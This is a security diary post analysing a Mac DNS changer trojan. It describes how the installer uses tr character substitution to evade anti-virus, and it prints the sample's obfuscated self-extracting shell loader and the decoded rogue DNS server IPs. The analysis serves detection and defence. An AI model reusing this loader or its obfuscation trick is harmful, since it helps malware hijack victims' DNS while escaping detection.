Back in November last year we published a diary about Mac DNS changer malware (http://isc.sans.org/diary.html?storyid=3595). The main idea about this was to let Mac users aware that the bad guys are not ignoring this platform any more.

While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.

All the malware did was change local DNS servers to couple of servers in a known bad network, and tell the command and control server that a new victim is ready.

The anti-virus coverage was especially disappointing. Only couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over the time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.

One of our readers, Matt, submitted a new sample today. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server.

However, one thing I noticed was that the attackers started obfuscating the installation code. The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. Signature detection failure I would say …

The deobfuscation is really simple: the new sample looks like this:

#!/bin/sh

x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos
upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw;
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;

#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
Ndkf
…

In other words, they take the file, count the lines, subtract 2 from the line number, tail the rest and pass it through the first tr command, and redirect the output to 1.

Second 2 tr commands are used to deobfuscate the s1 and s2 variables, which will contain the IP addresses of the DNS servers. These can be easily deobfuscated manually:

$ s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw; echo $s1|tr qazwsxedcr 0123456780
85.255.115.20
$ echo $s2| tr qazwsxedcr 0123456789
85.255.112.143

As you can see, it's the same network as before, so make sure that you are monitoring any DNS requests going there since they indicate you have infected machines on your network. And for the AV vendors – they will obviously have to step up on the Mac front.

--

Bojan